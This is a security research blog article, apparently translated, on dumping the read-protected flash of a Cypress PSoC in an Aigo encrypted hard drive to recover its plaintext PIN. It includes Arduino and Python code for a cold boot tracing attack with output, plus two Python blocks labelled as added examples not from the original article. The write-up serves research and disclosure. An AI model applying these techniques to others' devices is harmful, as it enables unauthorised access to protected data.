Reverse engineering and hacking the Aigo self-encrypting external HDD. Part 2: Dumping the Cypress PSoC

This is the second and final part of the article about hacking an external self-encrypting drive. Let me remind you that a colleague brought me a Patriot (Aigo) SK8671 hard drive, I decided to reverse engineer it, and now I'm sharing what came of it. Before reading on, please read the first part of the article.

4. Starting to dump the PSoC flash
5. The ISSP protocol
– 5.1. What is ISSP
– 5.2. Demystifying the vectors
– 5.3. Communicating with the PSoC
– 5.4. Identifying the on-chip registers
– 5.5. Security bits
6. First attack (failed): ROMX
7. Second attack: cold boot tracing
– 7.1. Implementation
– 7.2. Reading the result
– 7.3. Reconstructing the flash binary
– 7.4. Finding the PIN code storage address
– 7.5. Dumping block no. 126
– 7.6. Recovering the PIN code
8. What's next?
9. Conclusion



4. Starting to dump the PSoC flash

So everything indicates (as we established in the first part) that the PIN code is stored in the PSoC's internal flash. So we need to read that flash. Before getting to work, we need to:

  • establish "communication" with the microcontroller;
  • find a way to check whether this "communication" is protected against external reads;
  • find a way to bypass the protection.

There are two sensible places to look for the PIN code:

  • the internal flash memory;
  • the SRAM, where the PIN code may be kept in order to compare it with the PIN code entered by the user.

Looking ahead, I'll note that I did manage to dump the PSoC flash, bypassing its protection with an attack called "cold boot tracing", after reverse engineering undocumented features of the ISSP protocol. This allowed me to dump the real PIN code directly.

$ ./psoc.py 
syncing: KO OK
[...]
PIN: 1 2 3 4 5 6 7 8 9

Final program code:

5. The ISSP protocol

5.1. What is ISSP

"Communication" with a microcontroller can take various forms: from "vendor specific" to interaction over a serial protocol (for example, ICSP for Microchip's PIC).

Cypress has its own proprietary protocol for this, called ISSP (in-system serial programming protocol), which is described in the technical reference manual. Patent US7185162 also gives some information. There is also an open-source equivalent called HSSP (we'll use it a bit later). ISSP works as follows:

  • reset the PSoC;
  • output a magic number on the PSoC's serial data pin to enter external programming mode;
  • send commands, which are long bit strings called "vectors".

The ISSP documentation lists these vectors for only a small set of commands:

  • Initialize-1
  • Initialize-2
  • Initialize-3 (3V and 5V options)
  • ID-SETUP
  • READ-ID-WORD
  • SET-BLOCK-NUM: 10011111010dddddddd111, where dddddddd = block #
  • BULK-ERASE
  • PROGRAM-BLOCK
  • VERIFY-SETUP
  • READ-BYTE: 10110aaaaaaZDDDDDDDDZ1, where DDDDDDDD = data out, aaaaaa = address (6 bits)
  • WRITE-BYTE: 10010aaaaaadddddddd111, where dddddddd = data in, aaaaaa = address (6 bits)
  • SECURE
  • CHECKSUM-SETUP
  • READ-CHECKSUM: 10111111001ZDDDDDDDDZ110111111000ZDDDDDDDDZ1, where DDDDDDDDDDDDDDDD = data out: device checksum.
  • ERASE BLOCK

For example, the vector for Initialize-2:

1101111011100000000111 1101111011000000000111
1001111100000111010111 1001111100100000011111
1101111010100000000111 1101111010000000011111
1001111101110000000111 1101111100100110000111
1101111101001000000111 1001111101000000001111
1101111000000000110111 1101111100000000000111
1101111111100010010111

All vectors have the same length: 22 bits. The HSSP documentation gives some additional information on ISSP: "An ISSP vector is nothing more than a bit sequence representing a set of instructions."

5.2. Demystifying the vectors

Let's figure out what is going on here. At first I assumed these vectors were variants of M8C instructions, but after checking this hypothesis I found that the opcodes of the operations didn't match.

Then I searched the web for the vector above and found a study in which the author, while not going into details, gives a few useful hints: "Each instruction starts with three bits that correspond to one of four mnemonics (read from RAM, write to RAM, read register, write register). Then come 8 address bits, followed by 8 data bits (read or write) and then three stop bits."

Then I was able to gather some very useful information from the Supervisory ROM (SROM) section of the technical manual. The SROM is a hard-wired ROM inside the PSoC that provides useful functions (similar to syscalls) to program code running in user space:

  • 00h: SWBootReset
  • 01h: ReadBlock
  • 02h: WriteBlock
  • 03h: EraseBlock
  • 06h: TableRead
  • 07h: CheckSum
  • 08h: Calibrate0
  • 09h: Calibrate1

By matching the vector names against the SROM functions, we can map the various operations supported by this protocol onto the expected SROM parameters. Thanks to this, we can decode the first three bits of the ISSP vectors:

  • 100 => "wrmem"
  • 101 => "rdmem"
  • 110 => "wrreg"
  • 111 => "rdreg"

However, a full understanding of what happens on the chip could only be obtained by communicating directly with the PSoC.

5.3. Communicating with the PSoC

Since Dirk Petrautzki had already ported Cypress's HSSP code to the Arduino, I used an Arduino Uno to connect to the ISSP connector of the keyboard board.

Note that during my research I modified Dirk's code somewhat. You can find my modification on GitHub: here, along with the accompanying Python script for communicating with the Arduino, in my cypress_psoc_tools repository.

So, using the Arduino, I first used only the "official" vectors for "communication". I tried to read the internal ROM using the VERIFY command. As expected, I couldn't. This was probably because the read-protection bits are enabled in the flash.

Then I made a few simple vectors of my own for writing and reading memory and registers. Note that we can read the whole SROM even though the flash is protected!

5.4. Identifying the on-chip registers

After examining the "disassembled" vectors, I found that the device uses undocumented registers (0xF8-0xFA) to specify M8C opcodes, which are executed directly, bypassing the protection. This allowed me to run various opcodes such as "ADD", "MOV A,X", "PUSH" or "JMP". Thanks to them (by observing the side effects they had on the registers) I was able to determine which of the undocumented registers were actually the regular registers (A, X, SP and PC).

As a result, the "disassembled" code produced by the HSSP_disas.rb tool looks like this (I added comments for clarity):

--== init2 ==--
[DE E0 1C] wrreg CPU_F (f7), 0x00   # reset flags
[DE C0 1C] wrreg SP (f6), 0x00      # reset SP
[9F 07 5C] wrmem KEY1, 0x3A     # mandatory argument for SSC
[9F 20 7C] wrmem KEY2, 0x03     # likewise
[DE A0 1C] wrreg PCh (f5), 0x00     # reset PC (MSB) ...
[DE 80 7C] wrreg PCl (f4), 0x03     # (LSB) ... to 3 ??
[9F 70 1C] wrmem POINTER, 0x80      # RAM pointer for the output data
[DF 26 1C] wrreg opc1 (f9), 0x30        # Opcode 1 => "HALT"
[DF 48 1C] wrreg opc2 (fa), 0x40        # Opcode 2 => "NOP"
[9F 40 3C] wrmem BLOCKID, 0x01  # BLOCK ID for the SSC call
[DE 00 DC] wrreg A (f0), 0x06       # "syscall" number: TableRead
[DF 00 1C] wrreg opc0 (f8), 0x00        # Opcode for SSC, "Supervisory SROM Call"
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12    # Undocumented operation: execute external opcode
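As an added example (not the article's code and not HSSP_disas.rb), the following Python decoder splits the 22-bit vectors from section 5.1 into mnemonic, address and data bits as described in 5.2, and prints the Initialize-2 vectors in the same form as the listing above; the register map (A at 0xF0, X at 0xF3, PCl/PCh, SP, CPU_F, the opcode registers and CPU_SCR0) and the RAM names are taken from the listings on this page.

```python
# Added example, not from the article: a decoder for ISSP vectors.
# Layout of a 22-bit vector (section 5.2): 3 mnemonic bits, 8 address bits,
# 8 data bits, 3 stop bits. Read vectors (section 5.1) put a high-impedance
# "Z" bit on either side of the 8 data bits that the chip drives.

MNEMONICS = {"100": "wrmem", "101": "rdmem", "110": "wrreg", "111": "rdreg"}

# Register addresses as identified in section 5.4 (0xF8-0xFA hold the
# external opcodes the chip executes; the rest are normal M8C registers).
REG_NAMES = {0xF0: "A", 0xF3: "X", 0xF4: "PCl", 0xF5: "PCh", 0xF6: "SP",
             0xF7: "CPU_F", 0xF8: "opc0", 0xF9: "opc1", 0xFA: "opc2",
             0xFF: "CPU_SCR0"}

# RAM locations that the SROM functions take their arguments from.
RAM_NAMES = {0xF8: "KEY1", 0xF9: "KEY2", 0xFA: "BLOCKID", 0xFB: "POINTER"}

# The 13 Initialize-2 vectors exactly as listed in section 5.1.
INIT2_VECTORS = """
1101111011100000000111 1101111011000000000111
1001111100000111010111 1001111100100000011111
1101111010100000000111 1101111010000000011111
1001111101110000000111 1101111100100110000111
1101111101001000000111 1001111101000000001111
1101111000000000110111 1101111100000000000111
1101111111100010010111
""".split()


def decode_vector(bits):
    """Return (mnemonic, address, data); data is None for a read vector
    whose data bits are still unknown ('D' placeholders)."""
    if len(bits) != 22:
        raise ValueError("expected 22 bits, got %d" % len(bits))
    mnem = MNEMONICS.get(bits[:3])
    if mnem is None:
        raise ValueError("unknown mnemonic bits %s" % bits[:3])
    addr = int(bits[3:11], 2)
    if mnem.startswith("wr"):
        if bits[19:] != "111":
            raise ValueError("bad stop bits %s" % bits[19:])
        return mnem, addr, int(bits[11:19], 2)
    # Read vector: ... Z DDDDDDDD Z 1
    if bits[11] != "Z" or bits[20] != "Z" or bits[21] != "1":
        raise ValueError("malformed read vector %s" % bits)
    data = bits[12:20]
    return mnem, addr, (int(data, 2) if set(data) <= {"0", "1"} else None)


def packed_bytes(bits):
    """Pack a write vector MSB-first into the 3 bytes shown in brackets in
    the listings ([DE E0 1C]); the last byte is padded with two 0 bits."""
    padded = bits + "00"
    return [int(padded[i:i + 8], 2) for i in range(0, 24, 8)]


def format_vector(bits):
    """Render one vector the way the HSSP_disas.rb listing on this page does."""
    mnem, addr, data = decode_vector(bits)
    if mnem == "wrreg":
        target = "%s (%02x)" % (REG_NAMES.get(addr, "reg"), addr)
    elif mnem == "wrmem":
        target = RAM_NAMES.get(addr, "0x%02X" % addr)
    else:
        shown = "?" if data is None else "0x%02X" % data
        return "%s 0x%02X -> %s" % (mnem, addr, shown)
    hexs = " ".join("%02X" % b for b in packed_bytes(bits))
    return "[%s] %s %s, 0x%02X" % (hexs, mnem, target, data)


def disassemble(vectors):
    return [format_vector(v) for v in vectors]


if __name__ == "__main__":
    print("--== init2 ==--")
    for line in disassemble(INIT2_VECTORS):
        print(line)
    # READ-BYTE from section 5.1: its address bits are "10aaaaaa", i.e. RAM
    # 0x80 + a, the area that POINTER is set to for the SROM output data.
    print(format_vector("10110000001ZDDDDDDDDZ1"))
```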

5.5. Security bits

Now I could communicate with the PSoC, but I had no reliable information about the flash's security bits. I was very surprised that Cypress doesn't give the user any way to check whether protection is enabled. I dug through Google only to discover that the HSSP code provided by Cypress had been updated after Dirk released his modification. And there it was! This new vector appeared:

[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A
[9F 20 7C] wrmem KEY2, 0x03
[9F A0 1C] wrmem 0xFD, 0x00 # unknown arguments
[9F E0 1C] wrmem 0xFF, 0x00 # likewise
[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[DE 02 1C] wrreg A (f0), 0x10   # undocumented syscall!
[DF 00 1C] wrreg opc0 (f8), 0x00
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12

Using this vector (see read_security_data in psoc.py), we get all the security bits in SRAM at 0x80, two bits for each protected block.

The result is disappointing: everything is protected in "disable external read and write" mode. So not only can we not read anything from the flash, we can't write anything either (for example, to plant a ROM dumper there). And the only way to disable the protection is to erase the whole chip. 🙁

6. First attack (failed): ROMX

However, we can try the following trick: since we can execute arbitrary opcodes, why not execute ROMX, the instruction used to read flash memory? This approach looks promising, because the ReadBlock function that reads data from the SROM (and is used by the vectors) checks whether it is called from ISSP, whereas the ROMX opcode presumably has no such check. So here is the Python code (after adding a few helper classes to the Arduino code):

for i in range(0, 8192):
    write_reg(0xF0, i>>8)       # A = high byte of the address
    write_reg(0xF3, i&0xFF)     # X = low byte of the address
    exec_opcodes("\x28\x30\x40")    # ROMX, HALT, NOP
    byte = read_reg(0xF0)       # ROMX reads ROM[A|X] into A
    print "%02x" % ord(byte[0]) # print ROM byte

This code didn't work. 🙁 Or rather, it did work, but in the output we got our own opcodes (0x28 0x30 0x40)! I don't think this device behaviour is part of the read protection. It looks more like an engineering trick: while external opcodes are being executed, the ROM bus is redirected to a temporary buffer.

7. Second attack: cold boot tracing

Since the ROMX trick didn't work, I started thinking about another variant of this trick, described in the paper "Shedding too much light on a microcontroller's firmware protection".

7.1. Implementation

The ISSP documentation gives this vector for CHECKSUM-SETUP:

[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A
[9F 20 7C] wrmem KEY2, 0x03
[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[9F 40 1C] wrmem BLOCKID, 0x00
[DE 00 FC] wrreg A (f0), 0x07
[DF 00 1C] wrreg opc0 (f8), 0x00
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12

This calls SROM function 0x07, which the documentation describes as follows (italics mine):

This function is the checksum verification. It computes a 16-bit checksum of the number of blocks specified by the user in one flash bank, starting from zero. The BLOCKID parameter is used to pass the number of blocks to use in the checksum computation. A value of "1" computes the checksum only for block zero, while "0" computes the total checksum of all 256 blocks of the flash bank. The 16-bit checksum is returned via KEY1 and KEY2. The KEY1 parameter holds the low 8 bits of the checksum, and the KEY2 parameter holds the high 8 bits. For devices with multiple flash banks, the checksum function is called for each bank. The bank number to operate on is set by the FLS_PR1 register (by setting the bit in it that corresponds to the target flash bank).

Note that this is a simple checksum: the bytes are just added one after another; no fancy CRC quirks. Also, knowing that the M8C core has a very small set of registers, I assumed that during the checksum computation the intermediate values would be kept in the same variables that end up holding the result: KEY1 (0xF8) / KEY2 (0xF9).

So, in theory, my attack looked like this:

  1. Connect via ISSP.
  2. Start the checksum computation using the CHECKSUM-SETUP vector.
  3. Reset the processor after a specified time T.
  4. Read RAM to get the current checksum C.
  5. Repeat steps 3 and 4, increasing T slightly each time.
  6. Recover the flash data by subtracting the previous checksum C from the current one.

However, there is a problem: the Initialize-1 vector that we have to send after the reboot overwrites KEY1 and KEY2:

1100101000000000000000  # magic that puts the PSoC into programming mode
nop
nop
nop
nop
nop
[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A # the checksum is overwritten here
[9F 20 7C] wrmem KEY2, 0x03 # and here
[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[DE 01 3C] wrreg A (f0), 0x09   # SROM function 9
[DF 00 1C] wrreg opc0 (f8), 0x00    # SSC
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12

This code wipes our precious checksum by calling Calibrate1 (SROM function 9)... Maybe we can just send the magic number (from the beginning of the code above) to enter programming mode, and then read the SRAM? And yes, it works! The Arduino code implementing this attack is quite simple:

case Cmnd_STK_START_CSUM:
    // read the 32-bit delay (big-endian) sent by the Python script
    checksum_delay = ((uint32_t)getch())<<24;
    checksum_delay |= ((uint32_t)getch())<<16;
    checksum_delay |= ((uint32_t)getch())<<8;
    checksum_delay |= getch();
    // delayMicroseconds() is only accurate up to 16383 us, so split a long
    // delay into a millisecond part and a microsecond remainder
    if(checksum_delay > 10000) {
        ms_delay = checksum_delay/1000;
        checksum_delay = checksum_delay%1000;
    }
    else {
        ms_delay = 0;
    }
    send_checksum_v();              // send the CHECKSUM-SETUP vector
    if(checksum_delay)              // delayMicroseconds(0) misbehaves, skip it
        delayMicroseconds(checksum_delay);
    delay(ms_delay);
    start_pmode();                  // reset the PSoC into programming mode

  1. Read checksum_delay.
  2. Run the checksum computation (send_checksum_v).
  3. Wait for the specified time, keeping in mind these problems:
    • I wasted a lot of time before discovering that delayMicroseconds only works correctly with delays no longer than 16383 μs;
    • and then wasted just as much time again until I found that delayMicroseconds, when given 0 as input, misbehaves badly!
  4. Reset the PSoC into programming mode (we only send the magic number, without sending the initialization vectors).

The final code in Python:

for delay in range(0, 150000):  # delay in microseconds
    for i in range(0, 10):      # number of reads for each delay
        try:
            reset_psoc(quiet=True)  # reboot and enter programming mode
            send_vectors()      # send the initialization vectors
            ser.write("\x85"+struct.pack(">I", delay)) # compute checksum + reboot after the delay
            res = ser.read(1)       # read the Arduino ACK
        except Exception as e:
            print e
            ser.close()
            os.system("timeout -s KILL 1s picocom -b 115200 /dev/ttyACM0 2>&1 > /dev/null")
            ser = serial.Serial('/dev/ttyACM0', 115200, timeout=0.5) # open the serial port
            continue
        print "%05d %02X %02X %02X" % (delay,      # read the RAM bytes
                read_regb(0xf1),
                read_ramb(0xf8),
                read_ramb(0xf9))

In short, what this code does:

  1. Resets the PSoC (and sends it the magic number).
  2. Sends the full initialization vectors.
  3. Calls the Arduino function Cmnd_STK_START_CSUM (0x85), passing the delay in microseconds as a parameter.
  4. Reads the checksum (0xF8 and 0xF9) and the undocumented register 0xF1.

This code is executed 10 times per 1-microsecond step. 0xF1 is included because it was the only register that changed during the checksum computation. It is probably some kind of temporary variable used by the arithmetic logic unit. Note the ugly hack I use to reset the Arduino with picocom when it stops showing signs of life (no idea why).

7.2. Reading the result

The output of the Python script looks like this (simplified for readability):

DELAY F1 F8 F9  # F1 – the aforementioned unknown register
                  # F8 low byte of the checksum
                  # F9 high byte of the checksum

00000 03 E1 19
[...]
00016 F9 00 03
00016 F9 00 00
00016 F9 00 03
00016 F9 00 03
00016 F9 00 03
00016 F9 00 00  # the checksum is reset to 0
00017 FB 00 00
[...]
00023 F8 00 00
00024 80 80 00  # 1st byte: 0x0080-0x0000 = 0x80
00024 80 80 00
00024 80 80 00
[...]
00057 CC E7 00   # 2nd byte: 0xE7-0x80: 0x67
00057 CC E7 00
00057 01 17 01  # no idea what's going on here
00057 01 17 01
00057 01 17 01
00058 D0 17 01
00058 D0 17 01
00058 D0 17 01
00058 D0 17 01
00058 F8 E7 00  # E7 again?
00058 D0 17 01
[...]
00059 E7 E7 00
00060 17 17 00  # Hmmmmmm
[...]
00062 00 17 00
00062 00 17 00
00063 01 17 01  # Ah, got it! That's the carry into the high byte
00063 01 17 01
[...]
00075 CC 17 01  # So, 0x117-0xE7: 0x30

It's worth mentioning that we have a problem: since we are dealing with a real checksum, a null byte doesn't change the checksum value. However, since the whole computation (8192 bytes) takes 0.1478 seconds (with slight variations on each run), which corresponds to roughly 18.04 μs per byte, we can use this timing to check the checksum value at the appropriate moments. For the first runs everything reads out easily, since the duration of the computation is almost always the same. However, the end of this dump is less precise, because the "small timing variations" accumulate on each run.

134023 D0 02 DD
134023 CC D2 DC
134023 CC D2 DC
134023 CC D2 DC
134023 FB D2 DC
134023 3F D2 DC
134023 CC D2 DC
134024 02 02 DC
134024 CC D2 DC
134024 F9 02 DC
134024 03 02 DD
134024 21 02 DD
134024 02 D2 DC
134024 02 02 DC
134024 02 02 DC
134024 F8 D2 DC
134024 F8 D2 DC
134025 CC D2 DC
134025 EF D2 DC
134025 21 02 DD
134025 F8 D2 DC
134025 21 02 DD
134025 CC D2 DC
134025 04 D2 DC
134025 FB D2 DC
134025 CC D2 DC
134025 FB 02 DD
134026 03 02 DD
134026 21 02 DD

These are 10 dumps for each microsecond of delay. The total run time for dumping all 8192 bytes of the flash is about 48 hours.
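To make the stepping arithmetic of 7.1 and 7.2 concrete, here is an added Python model (not the article's code) of the cold boot tracing recovery: the SROM CheckSum routine is simulated as a plain 16-bit running sum at the measured 18.04 μs per byte, sampled after increasing delays with optional timing jitter and repeated reads, and the flash bytes are recovered by differencing consecutive samples, the way dump_pin() in 7.6 does; the flash contents, jitter and delays are constructed values.

```python
# Added example, not from the article: a model of the cold boot tracing
# recovery described in sections 7.1 and 7.2. All inputs are constructed.
import random
from collections import Counter

US_PER_BYTE = 18.04   # measured in 7.2: 0.1478 s for 8192 bytes


def checksum_after(flash, delay_us, us_per_byte=US_PER_BYTE):
    """16-bit sum (the SROM CheckSum behaviour quoted in 7.1) of the bytes
    the routine has processed when the chip is reset after delay_us."""
    done = max(0, min(len(flash), int(delay_us // us_per_byte)))
    return sum(flash[:done]) & 0xFFFF


def key1_key2(csum):
    """Split the checksum into the two RAM bytes left at 0xF8 / 0xF9."""
    return csum & 0xFF, csum >> 8


def trace(flash, start_us, stop_us, step_us, reads=1, jitter_us=0.0, seed=1):
    """Model of the 7.1 loop: for each delay, run the checksum, reset after
    the delay (plus random jitter, the 'small timing variations' of 7.2)
    and read KEY1/KEY2. Returns [(delay, [(KEY1, KEY2), ...]), ...]."""
    rng = random.Random(seed)
    out = []
    delay = start_us
    while delay < stop_us:
        samples = []
        for _ in range(reads):
            actual = delay + rng.uniform(-jitter_us, jitter_us)
            samples.append(key1_key2(checksum_after(flash, actual)))
        out.append((delay, samples))
        delay += step_us
    return out


def majority(traced):
    """Keep the most common reading per delay (the filtering the article
    did by hand on the 10 reads per microsecond)."""
    return [(delay, Counter(s).most_common(1)[0][0]) for delay, s in traced]


def recover_bytes(readings, us_per_byte=US_PER_BYTE):
    """Rebuild flash bytes from [(delay, (KEY1, KEY2)), ...].
    The difference is taken on the full 16-bit value, so the carry into
    KEY2 (0xE7 + 0x30 = 0x117 in 7.2) is handled. A zero difference is
    only counted as a real 0x00 byte when the delay has crossed into the
    next byte slot, which is how the null-byte ambiguity of 7.2 is resolved
    here (assuming the per-byte timing is stable)."""
    result = []
    last_csum, last_slot = 0, 0
    for delay, (k1, k2) in readings:
        csum = (k2 << 8) | k1
        slot = int(delay // us_per_byte)        # bytes summed by this delay
        diff = (csum - last_csum) & 0xFFFF
        advanced = slot - last_slot
        if advanced == 1:
            result.append(diff)                 # exactly one new byte
        elif advanced > 1 or diff:
            result.append(None)                 # coarse step or timing glitch
        last_csum, last_slot = csum, slot
    return result


if __name__ == "__main__":
    # Constructed flash image; its first three bytes reproduce the 0x80,
    # 0xE7, 0x117 checksum progression shown in 7.2 and it includes a 0x00.
    flash = bytes([0x80, 0x67, 0x30, 0x00, 0x25, 0x26, 0x27])
    readings = majority(trace(flash, 0, 130, 16, reads=10, jitter_us=1.0))
    for delay, (k1, k2) in readings:
        print("%05d %02X %02X" % (delay, k1, k2))
    print([None if b is None else "%02X" % b for b in recover_bytes(readings)])
```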

7.3. Reconstructing the flash binary

I haven't finished writing the code that reconstructs the flash program code while taking all the timing into account. However, I did recover the beginning of this code. To make sure I had done it correctly, I disassembled it with m8cdis:

0000: 80 67   jmp  0068h     ; Reset vector
[...]
0068: 71 10   or  F,010h
006a: 62 e3 87 mov  reg[VLT_CR],087h
006d: 70 ef   and  F,0efh
006f: 41 fe fb and  reg[CPU_SCR1],0fbh
0072: 50 80   mov  A,080h
0074: 4e    swap A,SP
0075: 55 fa 01 mov  [0fah],001h
0078: 4f    mov  X,SP
0079: 5b    mov  A,X
007a: 01 03   add  A,003h
007c: 53 f9   mov  [0f9h],A
007e: 55 f8 3a mov  [0f8h],03ah
0081: 50 06   mov  A,006h
0083: 00    ssc
[...]
0122: 18    pop  A
0123: 71 10   or  F,010h
0125: 43 e3 10 or  reg[VLT_CR],010h
0128: 70 00   and  F,000h ; Paging mode changed from 3 to 0
012a: ef 62   jacc 008dh
012c: e0 00   jacc 012dh
012e: 71 10   or  F,010h
0130: 62 e0 02 mov  reg[OSC_CR0],002h
0133: 70 ef   and  F,0efh
0135: 62 e2 00 mov  reg[INT_VC],000h
0138: 7c 19 30 lcall 1930h
013b: 8f ff   jmp  013bh
013d: 50 08   mov  A,008h
013f: 7f    ret

It looks quite plausible!

7.4. Finding the PIN code storage address

Now that we can read the checksum at the moments we need, we can easily check how and where it changes when we:

  • enter a wrong PIN code;
  • change the PIN code.

First, to find the storage address, I took a checksum dump in 10 ms increments after the reboot. Then I entered a wrong PIN and did the same.

The result wasn't very pleasant, since there were many changes. But in the end I was able to determine that the checksum changed somewhere between 120000 µs and 140000 µs of delay. But the "pincode" I saw there wasn't correct, due to an artifact of the delayMicroseconds procedure, which does strange things when given 0.

Then, after spending almost 3 hours on this, I remembered that the SROM CheckSum syscall takes an argument specifying the number of blocks to checksum! That means we can easily pin down the storage address of the PIN code and the "incorrect attempts" counter, with precision down to a 64-byte block.

My first runs gave this result:

[image: checksum dump from the first runs]

Then I changed the PIN code from "123456" to "1234567" and got:

[image: checksum dump after changing the PIN code]

So the PIN code and the counter of incorrect attempts are stored in block no. 126.

7.5. Dumping block no. 126

Block #126 should be at about 125x64x18 = 144000 μs from the start of the checksum computation in my full dump, and that matches quite well. Then, after manually filtering out the invalid dumps (caused by the accumulation of the "small timing variations"), I got these bytes (at a latency of 145527 μs):

[image: bytes of block 126]

It's quite obvious that the PIN code is stored unencrypted! These values are of course not ASCII codes, but as it turned out, they correspond to the readings taken from the capacitive keyboard.

Finally, I ran a few more tests to find where the incorrect-attempts counter is stored. Here is the result:

[image: dump showing the incorrect-attempts counter]

0xFF means "15 attempts" and is decremented with each failed attempt.

7.6. Recovering the PIN code

Here is my ugly code that puts all of the above together:

def dump_pin():
  # capacitive keyboard readings -> digits (see 7.5)
  pin_map = {0x24: "0", 0x25: "1", 0x26: "2", 0x27:"3", 0x20: "4", 0x21: "5",
        0x22: "6", 0x23: "7", 0x2c: "8", 0x2d: "9"}
  last_csum = 0
  pin_bytes = []
  # walk block 126 in 16 us steps, less than the ~18 us per byte (see 7.2)
  for delay in range(145495, 145719, 16):
    csum = csum_at(delay, 1)          # checksum read after a reset at `delay` us
    byte = (csum-last_csum)&0xFF      # new byte = difference of consecutive sums
    print "%05d %04x (%04x) => %02x" % (delay, csum, last_csum, byte)
    pin_bytes.append(byte)
    last_csum = csum
  print "PIN: ",
  for i in range(0, len(pin_bytes)):
    if pin_bytes[i] in pin_map:       # skip bytes that are not digit readings
      print pin_map[pin_bytes[i]],
  print

Here is the result of running it:

$ ./psoc.py 
syncing: KO OK
Resetting PSoC: KO Resetting PSoC: KO Resetting PSoC: OK
145495 53e2 (0000) => e2
145511 5407 (53e2) => 25
145527 542d (5407) => 26
145543 5454 (542d) => 27
145559 5474 (5454) => 20
145575 5495 (5474) => 21
145591 54b7 (5495) => 22
145607 54da (54b7) => 23
145623 5506 (54da) => 2c
145639 5506 (5506) => 00
145655 5533 (5506) => 2d
145671 554c (5533) => 19
145687 554e (554c) => 02
145703 554e (554e) => 00
PIN: 1 2 3 4 5 6 7 8 9

Hooray! It works!

Note that the latency values I used apply to one specific PSoC, the one I used.

8. What's next?

So, let's summarize the PSoC side, in the context of our Aigo drive:

  • we can read the SRAM even if it is read-protected;
  • we can bypass the read-out protection using a cold boot tracing attack and read the PIN code directly.

However, our attack has some shortcomings due to synchronization problems. It could be improved as follows:

  • write a utility that correctly decodes the data obtained from a "cold boot trace" attack;
  • use an FPGA device to generate more precise time delays (or use the Arduino hardware timers);
  • try another attack: enter a deliberately wrong PIN code, reboot and dump the RAM, hoping that the correct PIN code is kept in RAM for the comparison. However, this isn't so easy with the Arduino, since the Arduino signal level is 5 volts, while the board we are examining works with 3.3 volt signals.

One interesting thing that could be tried is playing with the supply voltage to bypass the read protection. If this approach worked, we could get the data directly from the flash, instead of relying on reading a checksum with imprecise time delays.

Since the SROM probably reads the protection bits via the ReadBlock syscall, we could do the same as described in Dmitry Nedospasov's blog, a reimplementation of Chris Gerlinski's attack presented at the "REcon Brussels 2017" conference.

Another fun thing that could be done is decapping the chip: take an SRAM dump, find undocumented syscalls and vulnerabilities.

9. Conclusion

So, the protection of this drive leaves much to be desired, since it uses a regular (not "hardened") microcontroller to store the PIN code... Also, I haven't (yet) looked at how things stand with data encryption on this device!

What would I recommend to Aigo? After analyzing several models of encrypted HDDs, in 2015 I gave a presentation at SyScan that examined the security problems of several external HDDs and made recommendations on what could be improved in them. 🙂

I spent two weekends and a few evenings on this research. About 40 hours in total, counting from the very beginning (when I opened the disk) to the end (the PIN code dump). The same 40 hours went into writing this article. It was a very interesting journey.

Source: www.habr.com
